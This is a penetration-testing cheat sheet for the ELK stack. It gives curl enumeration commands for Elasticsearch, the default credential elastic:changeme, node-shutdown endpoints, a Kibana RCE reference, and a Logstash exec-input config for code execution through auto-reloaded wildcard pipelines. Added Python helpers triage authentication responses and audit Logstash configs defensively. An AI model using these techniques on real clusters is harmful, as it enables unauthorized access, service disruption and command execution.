Pentest Book
ELK

Elasticsearch

Enum

# Check status:
curl -X GET "ELASTICSEARCH-SERVER:9200/"

# Check whether authentication is enabled:
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"

# Users (built-in accounts; elastic ships with the default password changeme):
elastic:changeme
kibana_system
logstash_system
beats_system
apm_system
remote_monitoring_user

# Other endpoints
/_cluster/health
/_cat/indices
/_cat/health

# Interesting endpoints (BE CAREFUL: these stop nodes)
/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown
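The two first requests above are only useful if you read the answer correctly: a 401 means credentials are enforced, a 200 with a user listing means the security API answered without authentication, and an error saying security is not enabled means the cluster has no authentication at all. The following triage helper is an added example (it is not part of the Pentest Book page); it works on captured status codes and bodies rather than making requests itself, and the sample bodies in it are constructed and abbreviated, not taken from any real cluster.

```python
"""Triage captured responses to GET / and GET /_xpack/security/user.

Added example, not from the Pentest Book page. Inputs are the HTTP status and
body of the two enumeration requests; sample bodies are constructed here.
"""
import json

# Built-in accounts the cheat sheet lists. Seeing them in an unauthenticated
# user listing is the clearest sign that the security API is open to anyone.
BUILTIN_USERS = {"elastic", "kibana_system", "logstash_system",
                 "beats_system", "apm_system", "remote_monitoring_user"}


def parse_root(body: str) -> dict:
    """Extract cluster name and version from the GET / banner."""
    doc = json.loads(body)
    return {
        "cluster_name": doc.get("cluster_name"),
        "version": doc.get("version", {}).get("number"),
    }


def classify_security(status: int, body: str) -> dict:
    """Say what a GET /_xpack/security/user response means for authentication.

    verdict is one of:
      auth_required - 401: credentials are enforced
      anonymous     - 200 with a user listing: security API reachable without auth
      disabled      - error whose reason says security is not enabled
      unknown       - anything else; the raw status is returned for a human
    """
    try:
        doc = json.loads(body) if body else {}
    except json.JSONDecodeError:
        doc = {}
    if not isinstance(doc, dict):
        doc = {}

    if status == 401:
        return {"verdict": "auth_required", "users": []}

    if status == 200 and doc and "error" not in doc:
        users = sorted(doc.keys())  # the user API keys its result by username
        return {"verdict": "anonymous", "users": users,
                "builtin_seen": sorted(BUILTIN_USERS & set(users))}

    reason = " ".join(c.get("reason", "")
                      for c in doc.get("error", {}).get("root_cause", []))
    if "security" in reason.lower() and "enabled" in reason.lower():
        return {"verdict": "disabled", "users": [], "reason": reason}

    return {"verdict": "unknown", "users": [], "status": status}


# Constructed sample responses (abbreviated; not captured from a real host).
SAMPLE_ROOT = json.dumps({"name": "node-1", "cluster_name": "lab-cluster",
                          "version": {"number": "7.10.2"}})
SAMPLE_401 = json.dumps({"error": {"type": "security_exception",
                                   "reason": "missing authentication credentials"},
                         "status": 401})
SAMPLE_ANON = json.dumps({"elastic": {"username": "elastic", "roles": ["superuser"]},
                          "kibana_system": {"username": "kibana_system",
                                            "roles": ["kibana_system"]}})
SAMPLE_DISABLED = json.dumps({"error": {"root_cause": [{"type": "exception",
                              "reason": "Security must be explicitly enabled when using a "
                                        "[basic] license."}]}, "status": 500})

if __name__ == "__main__":
    print(parse_root(SAMPLE_ROOT))
    for st, body in ((401, SAMPLE_401), (200, SAMPLE_ANON), (500, SAMPLE_DISABLED)):
        print(st, classify_security(st, body)["verdict"])
```

Feed it the status and body you actually received; the verdict "anonymous" with built-in users listed is the finding to write up (or, on the defending side, to fix by enabling xpack security and restricting anonymous access), while "disabled" means the cluster has no authentication layer at all.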

With creds

# Using the API key:
curl -H "Authorization: ApiKey <API-KEY>" ELASTICSEARCH-SERVER:9200/

# Get more information about the rights of a user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"

# List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"

# List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"

Internal config files

Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml
Kibana configuration: /etc/kibana/kibana.yml
Logstash configuration: /etc/logstash/logstash.yml
Filebeat configuration: /etc/filebeat/filebeat.yml
Users file: /etc/elasticsearch/users_roles

Kibana

Basic

# Port: 5601
# Config file && users: /etc/kibana/kibana.yml
# Try also with the user kibana_system
# Version < 6.6.0 = RCE (https://github.com/LandGrey/CVE-2019-7609/)

Logstash

Basic

# Pipelines config: /etc/logstash/pipelines.yml
# Check pipelines with this property: "config.reload.automatic: true"
# If the pipeline config path is a file wildcard, any matching file is loaded:
###################
input {
  exec {
    command => "whoami"
    interval => 120
  }
}

output {
  file {
    path => "/tmp/output.log"
    codec => rubydebug
  }
}
####################
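The combination that matters here is three settings at once: config.reload.automatic is true, a pipeline's config path is a wildcard, and the directory that wildcard points at can be written to by someone other than the Logstash owner. The audit below is an added example, not code from the Pentest Book page or from Logstash itself: it reads logstash.yml and pipelines.yml under a base directory (the page's /etc/logstash by default, overridable so it can run against a constructed sample tree), follows each path.config glob, and reports the pieces of that chain it finds, including any pipeline file that already carries an exec input. The YAML handling is a deliberately small line-based match on the two keys involved, not a general YAML parser; the sample tree it builds is constructed for the demonstration.

```python
"""Audit a Logstash tree for auto-reload + wildcard path + exec input.

Added example, not from the Pentest Book page or from Logstash. Standard
library only; the two YAML keys are matched line by line rather than with a
full YAML parser.
"""
import glob
import os
import re
import stat
import tempfile

RELOAD_RE = re.compile(r"^\s*config\.reload\.automatic\s*:\s*(true|false)\s*$", re.I)
PATH_CONFIG_RE = re.compile(r"^\s*-?\s*path\.config\s*:\s*[\"']?([^\"'\s#]+)")
# Heuristic: an exec plugin that appears inside an input block before any other
# plugin closes. Good enough for a dropped-in file like the one above.
EXEC_INPUT_RE = re.compile(r"\binput\s*\{[^}]*\bexec\s*\{", re.S)


def read_lines(path):
    try:
        with open(path, encoding="utf-8") as fh:
            return fh.read().splitlines()
    except OSError:
        return []


def reload_enabled(base_dir):
    """True if logstash.yml sets config.reload.automatic: true (default is false)."""
    for line in read_lines(os.path.join(base_dir, "logstash.yml")):
        m = RELOAD_RE.match(line)
        if m:
            return m.group(1).lower() == "true"
    return False


def pipeline_paths(base_dir):
    """Every path.config value declared in pipelines.yml."""
    paths = []
    for line in read_lines(os.path.join(base_dir, "pipelines.yml")):
        m = PATH_CONFIG_RE.match(line)
        if m:
            paths.append(m.group(1))
    return paths


def writable_by_others(path):
    """True if the path is group- or world-writable."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_logstash(base_dir="/etc/logstash"):
    """Return (code, detail) findings; an empty list means nothing was flagged."""
    findings = []
    if reload_enabled(base_dir):
        findings.append(("AUTO_RELOAD", "config.reload.automatic is true"))
    for pattern in pipeline_paths(base_dir):
        if any(ch in pattern for ch in "*?["):
            findings.append(("WILDCARD_PATH", pattern))
            parent = os.path.dirname(pattern)
            if writable_by_others(parent):
                findings.append(("WRITABLE_DIR", parent))
        for conf in sorted(glob.glob(pattern)):
            if EXEC_INPUT_RE.search("\n".join(read_lines(conf))):
                findings.append(("EXEC_INPUT", conf))
            if writable_by_others(conf):
                findings.append(("WRITABLE_FILE", conf))
    return findings


def build_sample_tree(root):
    """Write a constructed Logstash tree under root (not config from any real host)."""
    conf_d = os.path.join(root, "conf.d")
    os.makedirs(conf_d, exist_ok=True)
    with open(os.path.join(root, "logstash.yml"), "w") as fh:
        fh.write("path.data: /var/lib/logstash\nconfig.reload.automatic: true\n")
    with open(os.path.join(root, "pipelines.yml"), "w") as fh:
        fh.write(f'- pipeline.id: main\n  path.config: "{conf_d}/*.conf"\n')
    with open(os.path.join(conf_d, "99-dropped.conf"), "w") as fh:
        fh.write('input {\n  exec {\n    command => "whoami"\n    interval => 120\n  }\n}\n'
                 'output {\n  file {\n    path => "/tmp/output.log"\n  }\n}\n')
    return root


def demo_findings():
    """Run the audit over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_logstash(build_sample_tree(tmp))


if __name__ == "__main__":
    for code, detail in demo_findings():
        print(f"{code:14} {detail}")
```

On a real host run audit_logstash() with the default base directory; WILDCARD_PATH together with AUTO_RELOAD is worth a note on its own, and WRITABLE_DIR or WRITABLE_FILE next to them turns the note into a finding, since any file matching the glob is picked up without a restart.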